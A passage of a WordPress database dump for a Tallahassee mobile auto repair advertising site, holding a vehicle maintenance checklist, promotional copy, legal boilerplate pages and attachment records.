INSERT INTO `wp_posts` VALUES("27", "1", "2015-02-03 05:07:25", "2015-02-03 10:07:25", "&nbsp;\r\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" width=\"585\">\r\n<h2><b><i><img class=\"alignleft size-full wp-image-38\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mobile-Mechanic.jpg\" alt=\"Mobile-Mechanic\" width=\"150\" height=\"150\" />Professional Auto Repair Mechanics</i></b></h2>\r\n<h2><b><i>Will Travail to Your Place of Business - your home or office for Regular Scheduled Check-Ups!</i></b></h2>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1 align=\"center\"></h1>\r\n<h1 align=\"center\"><i>Keep On Trucking with Basic Regular</i></h1>\r\n<h1 align=\"center\"><i>Check-ups with benefits</i></h1>\r\n<h1 style=\"text-align: center;\"><em>Mobile Auto Repair</em></h1>\r\n<span style=\"color: #888888;\"><i>By TheMobileMechanics.org  </i></span>\r\n<h3> <span style=\"text-decoration: underline;\">Keep your car truck or van in tips top condition</span> with regular scheduled maintenance by following the owner\'s manual and a check-list of preventive maintenance <b>“will make your vehicles last longer and fuel efficient”.</b></h3>\r\n<h3><b> </b>It is important “<b>to have regular check-ups” </b>to protect engine performance; <b><i>here is a list of useful tips for maintaining your car’s engine:</i></b></h3>\r\n&nbsp;\r\n\r\n<a href=\"http://themobilemechanics.org/\"><img class=\"alignnone wp-image-41 size-thumbnail\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mobile-auto-maintenance-150x150.jpeg\" alt=\"Mobile auto repair and maintenance\" width=\"150\" height=\"150\" /></a>\r\n<h2><b>Preventive</b><b> Maintenance Schedule</b></h2>\r\n<h2></h2>\r\n<h2><b>Checklist: </b></h2>\r\n&nbsp;\r\n\r\nI.     <b>On average every “One Thousand miles” have a routine vehicle maintenance inspection</b>\r\n<ul>\r\n	<li>1) Engine motor oil</li>\r\n	<li>2) Coolant fluid; always check the engine compartment for any signs of leaks</li>\r\n	<li>3) Transmission fluid</li>\r\n	<li>4) Brake fluid</li>\r\n	<li>5) Check tire pressure</li>\r\n	<li>6) Inspect belts and hoses (frayed or cracked taking it for granted can create serious engine problems)</li>\r\n	<li>7) Inspect brake - replace if needed</li>\r\n	<li>8) Inspect suspension</li>\r\n	<li>9) Battery inspection</li>\r\n	<li>10)*Check all other fluids in the engine and add replace as needed (fluids are important).</li>\r\n</ul>\r\nII       <b>Every “Three Thousand miles” - vehicle preventive maintenance</b>\r\n<ul>\r\n	<li>1) Change oil; (a primary engine maintenance tips is to change the engine oil along with the filter.</li>\r\n</ul>\r\nthis will ensure proper lubrication and performance of the engine)\r\n<ul>\r\n	<li>2) Lubricate chassis\' key joints.</li>\r\n</ul>\r\nIII      <b>Every “Six Thousand miles”</b>\r\n<ul>\r\n	<li>1) Rotate tires to keep the road handling performance healthy.</li>\r\n</ul>\r\nIV      <b>Every “Twelve Thousand” - scheduled vehicle maintenance</b>\r\n<ul>\r\n	<li>1) Flush radiator, replace anti-freeze</li>\r\n	<li>2) Replace air filters.</li>\r\n</ul>\r\nV       <b>Every Twenty Four Thousand miles - Tune Up Checklist</b>\r\n<ul>\r\n	<li>1) Replace spark plugs; be wary of spark plugs that are beyond the recommended 30,000-mile range</li>\r\n	<li>2) Change transmission fluid, filter and pan gasket.</li>\r\n</ul>\r\nVI      <b>Every “Thirty Thousand Miles” - preventative car maintenance</b>\r\n<ul>\r\n	<li>1) Check and test ignition wires (replace if needed)</li>\r\n	<li>2) Test cooling system and heating hoses (replace repair if needed)</li>\r\n	<li>3) Replace fluid in differential and manual transmission.</li>\r\n</ul>\r\n&nbsp;\r\n<h3> Following the guidelines of your owner\'s vehicle maintenance booklet is the key to keeping your car - truck or van “going for as long as possible”.</h3>\r\n<h3> Each automobile is as different as so their drivers. Putting a little extra money into your vehicle “often times pays off” in the long-run.  (It won\'t last long if you definitely don\'t care.)</h3>\r\n<h3> Wax it often, treat it like a baby, don\'t ride your brakes, <span style=\"text-decoration: underline;\">avoid burning rubber</span> - unless you’re racing or impressing the guys &amp; dalls!</h3>\r\n<h3><b> </b><i><span style=\"text-decoration: underline;\">The Traveling Mobile Mechanics for all your premium mobile auto repair &amp; care needs</span></i><span style=\"text-decoration: underline;\"> today!</span></h3>\r\n<h1></h1>\r\n<h2 style=\"text-align: center;\">Get the premium mobile auto repair &amp; care service from your neighborhood mechanic by calling</h2>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h2 style=\"text-align: center;\"><b> <span class=\"number\">(813) 361-1384</span> Today!</b></h2>\r\n<h1 style=\"text-align: center;\"><img class=\"aligncenter size-full wp-image-42\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/The-Mechanic-Logo-300x73.png\" alt=\"The-Mechanic-Logo-300x73\" width=\"300\" height=\"73\" /></h1>\r\n<h1 style=\"text-align: center;\"> <strong><span style=\"text-decoration: underline;\">Mobile Auto Repair</span></strong></h1>\r\n<h2 style=\"text-align: center;\"><span class=\"number\">(813) 361-1384</span></h2>\r\n<p align=\"center\"><b><i>copyright protected</i></b></p>\r\n<a href=\"http://tallahassee.themobilemechanics.org/\"><img class=\"aligncenter size-full wp-image-43\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/mobile-mechanics-150x150.jpg\" alt=\"mobile-mechanics-150x150\" width=\"150\" height=\"150\" /></a>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\">The above mechanic(s) &amp; the mobile mechanic\'s business</span></p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"> is individually owned and operated.</span></p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\">TheMobileMechanics.org is an advertising agent</span></p>", "Preventive Maintenance Schedule", "", "publish", "closed", "closed", "", "preventive-maintenance-schedule", "", "", "2015-02-06 21:52:59", "2015-02-07 02:52:59", "", "0", "http://tallahassee.themobilemechanics.org/?p=27", "0", "post", "", "0");
INSERT INTO `wp_posts` VALUES("37", "1", "2015-02-03 11:57:55", "2015-02-03 16:57:55", "The Mobile Mechanics", "The Mobile Mechanics", "", "inherit", "closed", "closed", "", "the-mobile-mechanics", "", "", "2015-02-03 11:58:25", "2015-02-03 16:58:25", "", "27", "http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/The-Mobile-Mechanics.jpg", "0", "attachment", "image/jpeg", "0");
INSERT INTO `wp_posts` VALUES("38", "1", "2015-02-03 11:58:49", "2015-02-03 16:58:49", "", "Mobile-Mechanic", "", "inherit", "closed", "closed", "", "mobile-mechanic", "", "", "2015-02-03 11:58:49", "2015-02-03 16:58:49", "", "27", "http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mobile-Mechanic.jpg", "0", "attachment", "image/jpeg", "0");
INSERT INTO `wp_posts` VALUES("41", "1", "2015-02-03 12:04:20", "2015-02-03 17:04:20", "Mobile auto repair and maintenance", "Mobile auto repair and maintenance", "", "inherit", "closed", "closed", "", "mobile-auto-repair-and-maintenance", "", "", "2015-02-03 12:04:48", "2015-02-03 17:04:48", "", "27", "http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mobile-auto-maintenance.jpeg", "0", "attachment", "image/jpeg", "0");
INSERT INTO `wp_posts` VALUES("42", "1", "2015-02-03 12:06:17", "2015-02-03 17:06:17", "", "The-Mechanic-Logo-300x73", "", "inherit", "closed", "closed", "", "the-mechanic-logo-300x73", "", "", "2015-02-03 12:06:17", "2015-02-03 17:06:17", "", "27", "http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/The-Mechanic-Logo-300x73.png", "0", "attachment", "image/png", "0");
INSERT INTO `wp_posts` VALUES("43", "1", "2015-02-03 12:07:14", "2015-02-03 17:07:14", "", "mobile-mechanics-150x150", "", "inherit", "closed", "closed", "", "mobile-mechanics-150x150", "", "", "2015-02-03 12:07:14", "2015-02-03 17:07:14", "", "27", "http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/mobile-mechanics-150x150.jpg", "0", "attachment", "image/jpeg", "0");
INSERT INTO `wp_posts` VALUES("45", "1", "2015-02-03 12:11:33", "2015-02-03 17:11:33", "", "Roadside-assistance", "", "inherit", "closed", "closed", "", "roadside-assistance", "", "", "2015-02-03 12:11:33", "2015-02-03 17:11:33", "", "25", "http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Roadside-assistance.jpg", "0", "attachment", "image/jpeg", "0");
INSERT INTO `wp_posts` VALUES("48", "1", "2015-02-03 12:13:29", "2015-02-03 17:13:29", "Mechanic-auto-repair", "Mechanic-auto-repair-shop", "", "inherit", "closed", "closed", "", "mechanic-auto-repair", "", "", "2015-02-03 12:14:34", "2015-02-03 17:14:34", "", "14", "http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mechanic-auto-repair.jpg", "0", "attachment", "image/jpeg", "0");
INSERT INTO `wp_posts` VALUES("55", "1", "2015-02-02 17:31:49", "2015-02-02 22:31:49", "<div id=\"content\">\r\n\r\nThis website and its content is copyright of TheMobileMechanics.org (an advertising agent) - © TheMobileMechanics.org (an advertising agent) 2015. All rights reserved.\r\n\r\nAny redistribution or reproduction of part or all of the contents in any form is prohibited other than the following:\r\n<ul>\r\n	<li>You may print or download to a local hard disk extracts for your personal and non-commercial use only.</li>\r\n	<li>You may copy the content to individual third parties for their personal use, but only if you acknowledge the website as the source of the material</li>\r\n</ul>\r\nYou may not, except with our express written permission, distribute or commercially exploit the content. Nor may you transmit it or store it in any other website or other form of electronic retrieval system.\r\n\r\n</div>", "Copyright", "", "publish", "closed", "closed", "", "copyright", "", "", "2015-02-07 16:28:35", "2015-02-07 21:28:35", "", "0", "http://tallahassee.themobilemechanics.org/copyright/", "0", "page", "", "0");
INSERT INTO `wp_posts` VALUES("56", "1", "2015-02-02 17:31:49", "2015-02-02 22:31:49", "         <h1>Earnings Dislaimer</h1>\n      \n      Any earnings or income statements, or earnings or income examples, are only estimates of what we think you could earn. there is no assurance you will do as well. If you rely upon our figures, you must accept the risk of not doing as well.\n\n      Where specific income figures are used, and attributed to an individual or business, those persons or businesses have earned that amount. There is no assurance you will do as well. If you rely upon our figures; you must accept the risk of not doing as well.\n\n      Any and all claims or representations, as to income earnings on this web site, are not to be considered as average earnings.\n\n      There can be no assurance that any prior successes, or past results, as to income earnings, can be used as an indication of your future success or results.\n\n      <h2>Income Disclaimer</h2>\n\n      This website and the items it distributes contain business strategies, marketing methods and other business advice that, regardless of my own results and experience, may not produce the same results (or any results) for you. Business Name makes absolutely no guarantee, expressed or implied, that by following the advice or content available from this web site you will make any money or improve current profits, as there are several factors and variables that come into play regarding any given business.\n\n      Primarily, results will depend on the nature of the product or business model, the conditions of the marketplace, the experience of the individual, and situations and elements that are beyond your control.\n\n      As with any business endeavour, you assume all risk related to investment and money based on your own discretion and at your own potential expense.\n\n      <h2>Liability Disclaimer</h2>\n\n      By reading this website or the documents it offers, you assume all risks associated with using the advice given, with a full understanding that you, solely, are responsible for anything that may occur as a result of putting this information into action in any way, and regardless of your interpretation of the advice.\n\n      You further agree that our company cannot be held responsible in any way for the success or failure of your business as a result of the information provided by our company. It is your responsibility to conduct your own due diligence regarding the safe and successful operation of your business if you intend to apply any of our information in any way to your business operations.\n\n      In summary, you understand that we make absolutely no guarantees regarding income as a result of applying this information, as well as the fact that you are solely responsible for the results of any action taken on your part as a result of any given information.\n\n      In addition, for all intents and purposes you agree that our content is to be considered &quot;for entertainment purposes only.&quot; Always seek the advice of a professional when making financial, tax or business decisions.", "Earnings", "", "publish", "closed", "closed", "", "earnings", "", "", "2015-02-07 16:28:35", "2015-02-07 21:28:35", "", "0", "http://tallahassee.themobilemechanics.org/earnings/", "0", "page", "", "0");
INSERT INTO `wp_posts` VALUES("57", "1", "2015-02-02 17:31:49", "2015-02-02 22:31:49", "<h1>Privacy Policy Statement</h1>\r\nWe can be reached via e-mail at <b>support@themobilemechanics.org</b>\r\n\r\nThis privacy policy sets out how TheMobileMechanics.org (an advertising agent) uses and protects any information that you give TheMobileMechanics.org (an advertising agent) when you use this website.\r\n\r\nTheMobileMechanics.org (an advertising agent) is committed to ensuring that your privacy is protected. Should we ask you to provide certain information by which you can be identified when using this website, then you can be assured that it will only be used in accordance with this privacy statement.\r\n\r\nTheMobileMechanics.org (an advertising agent) may change this policy from time to time by updating this page. You should check this page from time to time to ensure that you are happy with any changes.\r\n<h2>What We Collect</h2>\r\nFor each visitor to our Web page, our Web server automatically recognizes the domain name and e-mail address of the consumer (where possible).\r\n\r\nWe collect the e-mail addresses of those who communicate with us via e-mail, payment information (e.g., credit card number and billing address).\r\n\r\nWe may collect the following information:\r\n<ul>\r\n	<li>Name and job title</li>\r\n	<li>Contact information including email address</li>\r\n	<li>Demographic information such as postcode, preferences and interests</li>\r\n	<li>Other information relevant to customer surveys and/or offers</li>\r\n</ul>\r\n<h2>What We Do With The Information We Gather</h2>\r\nWe require this information to understand your needs and provide you with a better service, and in particular for the following reasons:\r\n<ul>\r\n	<li>Internal record keeping.</li>\r\n	<li>We may use the information to improve our products and services.</li>\r\n	<li>We may periodically send promotional emails about new products, special offers or other information which we think you may find interesting using the email address which you have provided.</li>\r\n	<li>From time to time, we may also use your information to contact you for market research purposes. We may contact you by email, phone, fax or mail. We may use the information to customise the website according to your interests.</li>\r\n</ul>\r\n<h2>Security</h2>\r\nWe are committed to ensuring that your information is secure. In order to prevent unauthorised access or disclosure, we have put in place suitable physical, electronic and managerial procedures to safeguard and secure the information we collect online.\r\n<h2>How We Use Cookies</h2>\r\nA cookie is a small file which asks permission to be placed on your computer. Once you agree, the file is added and the cookie helps analyse web traffic or lets you know when you visit a particular site. Cookies allow web applications to respond to you as an individual. The web application can tailor its operations to your needs, likes and dislikes by gathering and remembering information about your preferences.\r\n\r\nWe may use traffic log cookies to identify which pages are being used. This helps us analyse data about web page traffic and improve our website in order to tailor it to customer needs. We only use this information for statistical analysis purposes and then the data is removed from the system.\r\n\r\nOverall, cookies help us provide you with a better website, by enabling us to monitor which pages you find useful and which you do not. A cookie in no way gives us access to your computer or any information about you, other than the data you choose to share with us.  You can choose to accept or decline cookies. Most web browsers automatically accept cookies, but you can usually modify your browser setting to decline cookies if you prefer. This may prevent you from taking full advantage of the website.\r\n<h2>Links To Other Websites</h2>\r\nOur website may contain links to other websites of interest. However, once you have used these links to leave our site, you should note that we do not have any control over that other website. Therefore, we cannot be responsible for the protection and privacy of any information which you provide whilst visiting such sites and such sites are not governed by this privacy statement. You should exercise caution and look at the privacy statement applicable to the website in question.\r\n<h2>Controlling Y&gt;our Personal Information</h2>\r\nYou may choose to restrict the collection or use of your personal information in the following ways:\r\n<ul>\r\n	<li>Whenever you are asked to fill in a form on the website, look for the box that you can click to indicate that you do not want the information to be used by anybody for direct marketing purposes.</li>\r\n	<li>If you have previously agreed to us using your personal information for direct marketing purposes,  you may change your mind at any time by writing to or emailing us at <b>support@themobilemechanics.org</b>.</li>\r\n</ul>\r\nWe will not sell, distribute or lease your personal information to third parties unless we have your permission or are required by law to do so. We may use your personal information to send you promotional information about third parties which we think you may find interesting if you tell us that you wish this to happen.\r\n\r\nYou may request details of personal information which we hold about you as governed by the laws of 0. A small fee may be payable. If you would like a copy of the information held on you please write to .\r\n\r\nIf you believe that any information we are holding on you is incorrect or incomplete, please write to or email us as soon as possible, at the above address. We will promptly correct any information found to be incorrect.", "Privacy", "", "publish", "closed", "closed", "", "privacy", "", "", "2015-02-07 16:28:35", "2015-02-07 21:28:35", "", "0", "http://tallahassee.themobilemechanics.org/privacy/", "0", "page", "", "0");
INSERT INTO `wp_posts` VALUES("58", "1", "2015-02-02 17:31:50", "2015-02-02 22:31:50", "<div id=\"content\">\r\n<h1>Terms &amp; Conditions</h1>\r\nWelcome to our website. If you continue to browse and use this website, you are agreeing to comply with and be bound by the following terms and conditions of use, which together with our privacy policy govern the relationship between TheMobileMechanics.org (an advertising agent) and you in relation to this website. If you disagree with any part of these terms and conditions, please do not use our website.\r\n\r\nThe term <b>\"TheMobileMechanics.org (an advertising agent)\"</b> or \"us\" or \"we\" refers to the owner of the website. The term \"you\" refers to the user or viewer of our website.\r\n<h2>Use of This Web Site</h2>\r\nThe use of this website is subject to the following terms of use:\r\n<ul>\r\n	<li>The content of the pages of this website is for your general information and use only. It is subject to change without notice.</li>\r\n	<li>This website may use cookies to monitor browsing preferences. If you do allow cookies to be used, please refer to our privacy policy for details of what data we may collect and how it may be used.</li>\r\n	<li>Neither we nor any third parties provide any warranty or guarantee as to the accuracy, timeliness, performance, completeness or suitability of the information and materials found or offered on this website for any particular purpose. You acknowledge that such information and materials may contain inaccuracies or errors and we expressly exclude liability for any such inaccuracies or errors to the fullest extent permitted by law.</li>\r\n	<li>Your use of any information or materials on this website is entirely at your own risk, for which we shall not be liable.  It shall be your own responsibility to ensure that any products, services or information available through this website meet your specific requirements.</li>\r\n	<li>This website contains material which is owned by or licensed to us. This material includes, but is not limited to, the design, layout, look, appearance and graphics. Reproduction is prohibited other than in accordance with the copyright notice, which forms part of these terms and conditions.</li>\r\n	<li>All trademarks reproduced in this website, which are not the property of, or licensed to the operator, are acknowledged on the website.</li>\r\n	<li>Unauthorised use of this website may give rise to a claim for damages and/or be a criminal offence.</li>\r\n	<li>From time to time, this website may also include links to other websites. These links are provided for your convenience to provide further information. They do not signify that we endorse the website(s). We have no responsibility for the content of the linked website(s).</li>\r\n</ul>\r\n</div>", "Terms & Conditions", "", "publish", "closed", "closed", "", "terms-conditions", "", "", "2015-02-07 16:28:35", "2015-02-07 21:28:35", "", "0", "http://tallahassee.themobilemechanics.org/terms-conditions/", "0", "page", "", "0");
INSERT INTO `wp_posts` VALUES("59", "1", "2015-02-02 17:31:50", "2015-02-02 22:31:50", "<div id=\"content\">\r\n<h1>Disclaimer</h1>\r\nIndividually Owned and Operated\r\n\r\nThe information contained in this website is for general information purposes only.\r\n\r\nThe information is provided by <b>TheMobileMechanics.org (an advertising agent)</b> and while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the individual mechanic, website or the information, products, services, or related graphics contained on the website for any purpose. Each and every mobile mechanic &amp; the mechanic\'s privately owned business is individually owned and operated.\r\n\r\nAny reliance you place on such information is therefore strictly at your own risk.\r\n\r\nIn no event will we be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the individually mechanic(s)  and this websitec.\r\n\r\nThrough this website you are able to employ a mechanic which is not under the control of  <b>TheMobileMechanics.org (an advertising agent)</b>. We have no control over the nature, content, skills and availability of the mechanic(s). The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.\r\n\r\nEvery effort is made to keep the website up and running smoothly. However, beyond our control  <b>TheMobileMechanics.org (an advertising agent)</b> takes no responsibility for, and will not be liable for, the privately owned mechanic\'s business and the individually mechanic.\r\n\r\n</div>", "Disclaimer", "", "publish", "closed", "closed", "", "disclaimer", "", "", "2015-02-07 16:28:35", "2015-02-07 21:28:35", "", "0", "http://tallahassee.themobilemechanics.org/disclaimer/", "0", "page", "", "0");
INSERT INTO `wp_posts` VALUES("60", "1", "2015-02-03 12:33:52", "2015-02-03 17:33:52", "This website and its content is copyright of [papertemplate-businessname] - © [papertemplate-businessname] [papertemplate-year]. All rights reserved.\r\n\r\nAny redistribution or reproduction of part or all of the contents in any form is prohibited other than the following:\r\n<ul>\r\n	<li>You may print or download to a local hard disk extracts for your personal and non-commercial use only.</li>\r\n	<li>You may copy the content to individual third parties for their personal use, but only if you acknowledge the website as the source of the material</li>\r\n</ul>\r\nYou may not, except with our express written permission, distribute or commercially exploit the content. Nor may you transmit it or store it in any other website or other form of electronic retrieval system.", "Copyright", "", "inherit", "closed", "closed", "", "55-autosave-v1", "", "", "2015-02-03 12:33:52", "2015-02-03 17:33:52", "", "55", "http://tallahassee.themobilemechanics.org/55-autosave-v1/", "0", "revision", "", "0");
INSERT INTO `wp_posts` VALUES("64", "1", "2015-02-03 13:08:21", "2015-02-03 18:08:21", "<h1>Disclaimer</h1>\nIndividually Owned and Operated\n\nThe information contained in this website is for general information purposes only.\n\nThe information is provided by <b>[papertemplate-businessname]</b> (an advertising agent) and while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Each and every mobile mechanic &amp; the mechanic\'s privately owned business is individually owned and operated.\n\nAny reliance you place on such information is therefore strictly at your own risk.\n\nIn no event will we be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the individually mechanic(s)  and this websitec.\n\nThrough this website you are able to employ a mechanic which is not under the control of <b>[papertemplate-businessname]</b>. We have no control over the nature, content, skills and availability of the mechanics. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.\n\nEvery effort is made to keep the website up and running smoothly. However, <b>[papertemplate-businessname]</b> takes no responsibility for, and will not be liable for, the privately owned mechanic\'s business and the individually mechanic being due to technical issues beyond our control.", "Disclaimer", "", "inherit", "closed", "closed", "", "59-autosave-v1", "", "", "2015-02-03 13:08:21", "2015-02-03 18:08:21", "", "59", "http://tallahassee.themobilemechanics.org/59-autosave-v1/", "0", "revision", "", "0");
INSERT INTO `wp_posts` VALUES("70", "1", "2015-02-03 17:05:50", "2015-02-03 22:05:50", "<div class=\"post\">\r\n<h1 align=\"center\"><a href=\"http://tallahassee.themobilemechanics.org/\"><img class=\"aligncenter size-full wp-image-71\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/mobile-auto-repair.jpg\" alt=\"mobile auto repair tampa\" width=\"300\" height=\"199\" /></a></h1>\r\n<h1 align=\"center\"><b><i>Introducing the Mobile Mechanics</i></b></h1>\r\n<h1 align=\"center\"><b><i>who’s there to care</i></b></h1>\r\n<h1 align=\"center\"><b><i>\"for your Auto Repairs\"</i></b></h1>\r\n<h3>If your car – truck or van is keeping you home-bond “let the traveling mobile mechanic” come to the rescue and fix your broken-down vehicle on the spot.</h3>\r\n<h3>Many times mechanical issues are minor and may only require a few small parts to repair.</h3>\r\n<h3>Having your car – truck or van towed to an <i>auto shop</i> can be the big event of your day, in its self as getting there is half the battle.</h3>\r\n<h3>Once your vehicle is safely parked in a<i> <b>driveway or parking lot (</b>even</i> r<i>oadside) having </i>a <i>mobile mechanic “who is willing to come to your place” of business or home can </i>save you time and money; here’s how:</h3>\r\n<strong>YES <img class=\"alignnone wp-image-59\" title=\"Miami Auto Repair Shop\" src=\"http://www.miamifl.themobilemechanics.org/wp-content/uploads/2014/03/auto-repair-shops.jpg\" alt=\"Miami auto repair shops\" width=\"35\" height=\"34\" /> Instead of having an expansive <i>towing service take your auto away – you </i>save money when the mobile mechanic brings the <i>auto services </i>to your car.</strong>\r\n\r\n<strong>YES <img class=\"alignnone size-full wp-image-73\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/auto-repair-shops.jpg\" alt=\"auto repair shops\" width=\"35\" height=\"34\" /></strong><strong>not having to wait around at an auto repair shop – you save time.</strong>\r\n\r\n<strong>YES <img class=\"alignnone size-full wp-image-73\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/auto-repair-shops.jpg\" alt=\"auto repair shops\" width=\"35\" height=\"34\" /> an the auto mechanics with their traveling tool-box can fix most any repair issues on the spot,</strong>\r\n\r\n<strong>YES <img class=\"alignnone size-full wp-image-73\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/auto-repair-shops.jpg\" alt=\"auto repair shops\" width=\"35\" height=\"34\" /> by dealing direct with the mechanic performing the work – you save big time by skipping the middle man.</strong>\r\n\r\n<strong>YES <img class=\"alignnone wp-image-59 size-full\" title=\"Miami Auto Repair Shop\" src=\"http://www.miamifl.themobilemechanics.org/wp-content/uploads/2014/03/auto-repair-shops.jpg\" alt=\"auto repair shops\" width=\"35\" height=\"34\" /> by having control of the parts you can save when ordering on line and buying on sale.</strong>\r\n\r\n<strong>YES <img class=\"alignnone size-full wp-image-73\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/auto-repair-shops.jpg\" alt=\"auto repair shops\" width=\"35\" height=\"34\" /> by consulting on a regular bases with your mobile mechanic who knows your car truck or van can keep your autos in tip top shape.</strong>\r\n<h2><strong>YES <img class=\"alignnone size-full wp-image-73\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/auto-repair-shops.jpg\" alt=\"auto repair shops\" width=\"35\" height=\"34\" /> this is a better way “just call your neighborhood local mobile mechanic today”</strong></h2>\r\n<h1>. <span style=\"color: #333300;\">(813) 361-1384</span></h1>\r\n<h1>Your neighborhood mobile mechanic</h1>\r\n<h1>is there for all your auto care repairs!</h1>\r\n<img class=\"aligncenter wp-image-61 size-full\" title=\"The Mobile Mechanic Miami Florida\" src=\"http://www.miamifl.themobilemechanics.org/wp-content/uploads/2014/03/The-Mechanic-miami.png\" alt=\"The-Mechanic-miami\" width=\"300\" height=\"73\" />\r\n<p align=\"center\"><b><i>copyright protected 2014</i></b></p>\r\n<p align=\"center\"><a href=\"http://en.wikipedia.org/wiki/Auto_mechanic\" target=\"_blank\"><img class=\"alignnone wp-image-69 size-thumbnail\" title=\"The Mobile Mechanics Miami Florida\" src=\"http://www.themobilemechanics.org/tampafl/wp-content/uploads/2014/02/mobile-mechanics-150x150.jpg\" alt=\"mobile mechanics\" width=\"150\" height=\"150\" /></a></p>\r\n<p style=\"text-align: center;\"><strong>(813) 361-1384</strong></p>\r\n\r\n</div>", "for your auto repairs", "", "publish", "closed", "closed", "", "for-your-auto-repairs", "", "", "2015-02-06 21:55:35", "2015-02-07 02:55:35", "", "0", "http://tallahassee.themobilemechanics.org/?p=70", "0", "post", "", "0");
INSERT INTO `wp_posts` VALUES("71", "1", "2015-02-03 13:35:22", "2015-02-03 18:35:22", "", "mobile auto repair tampa", "", "inherit", "closed", "closed", "", "mobile-auto-repair-tampa", "", "", "2015-02-03 13:35:22", "2015-02-03 18:35:22", "", "70", "http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/mobile-auto-repair.jpg", "0", "attachment", "image/jpeg", "0");
INSERT INTO `wp_posts` VALUES("73", "1", "2015-02-03 13:36:37", "2015-02-03 18:36:37", "", "auto repair shops", "", "inherit", "closed", "closed", "", "auto-repair-shops", "", "", "2015-02-03 13:36:37", "2015-02-03 18:36:37", "", "70", "http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/auto-repair-shops.jpg", "0", "attachment", "image/jpeg", "0");
INSERT INTO `wp_posts` VALUES("84", "1", "2015-02-03 14:31:21", "2015-02-03 19:31:21", " ", "", "", "publish", "closed", "closed", "", "84", "", "", "2015-02-03 14:31:21", "2015-02-03 19:31:21", "", "0", "http://tallahassee.themobilemechanics.org/?p=84", "1", "nav_menu_item", "", "0");
INSERT INTO `wp_posts` VALUES("85", "1", "2015-02-03 14:31:21", "2015-02-03 19:31:21", " ", "", "", "publish", "closed", "closed", "", "85", "", "", "2015-02-03 14:31:21", "2015-02-03 19:31:21", "", "0", "http://tallahassee.themobilemechanics.org/?p=85", "2", "nav_menu_item", "", "0");
INSERT INTO `wp_posts` VALUES("86", "1", "2015-02-03 14:31:21", "2015-02-03 19:31:21", " ", "", "", "publish", "closed", "closed", "", "86", "", "", "2015-02-03 14:31:21", "2015-02-03 19:31:21", "", "0", "http://tallahassee.themobilemechanics.org/?p=86", "3", "nav_menu_item", "", "0");
INSERT INTO `wp_posts` VALUES("87", "1", "2015-02-03 14:31:21", "2015-02-03 19:31:21", " ", "", "", "publish", "closed", "closed", "", "87", "", "", "2015-02-03 14:31:21", "2015-02-03 19:31:21", "", "0", "http://tallahassee.themobilemechanics.org/?p=87", "4", "nav_menu_item", "", "0");
INSERT INTO `wp_posts` VALUES("88", "1", "2015-02-03 14:31:21", "2015-02-03 19:31:21", " ", "", "", "publish", "closed", "closed", "", "88", "", "", "2015-02-03 14:31:21", "2015-02-03 19:31:21", "", "0", "http://tallahassee.themobilemechanics.org/?p=88", "5", "nav_menu_item", "", "0");
INSERT INTO `wp_posts` VALUES("97", "1", "2015-02-05 11:54:33", "2015-02-05 16:54:33", "Mobile Auto Repair mechanics", "Mobile Mechanics", "Mobile Auto Repair", "inherit", "closed", "closed", "", "mobile-header", "", "", "2015-02-05 11:56:01", "2015-02-05 16:56:01", "", "0", "http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mobile-Header.png", "0", "attachment", "image/png", "0");
INSERT INTO `wp_posts` VALUES("99", "1", "2015-02-05 12:24:24", "2015-02-05 17:24:24", "<em><span style=\"color: #ff0000;\"><strong><span style=\"font-size: 2em; line-height: 1.5em;\">“Mobile Auto Repair Greased Lighting  Service ”</span></strong></span></em>\r\n<h2>Mobile Auto Repair Mechanics in Tallahassee Florida are now available for car repairs at home or your place of business even roadside emergency repairs.</h2>\r\n<h2>For your convenience we can now send auto mechanics straight to your home, office or place of business to fix your car - truck or van to ware you are.</h2>\r\n<h2>For the best A.O.K. Mobile Mechanics in Tallahassee FL call your \"Tallahassee<strong> Mobile Mechanic\"</strong> at -</h2>\r\n<h2><span style=\"font-size: 2em; line-height: 1.5em;\">CALL US NOW: *<span class=\"number\" style=\"color: #333300;\">(813) 361-1384</span></span></h2>\r\n<h2></h2>\r\n<img class=\"alignleft size-full wp-image-48\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mechanic-auto-repair.jpg\" alt=\"Mechanic-auto-repair\" width=\"300\" height=\"210\" />\r\n<h3><span style=\"font-family: Georgia; color: 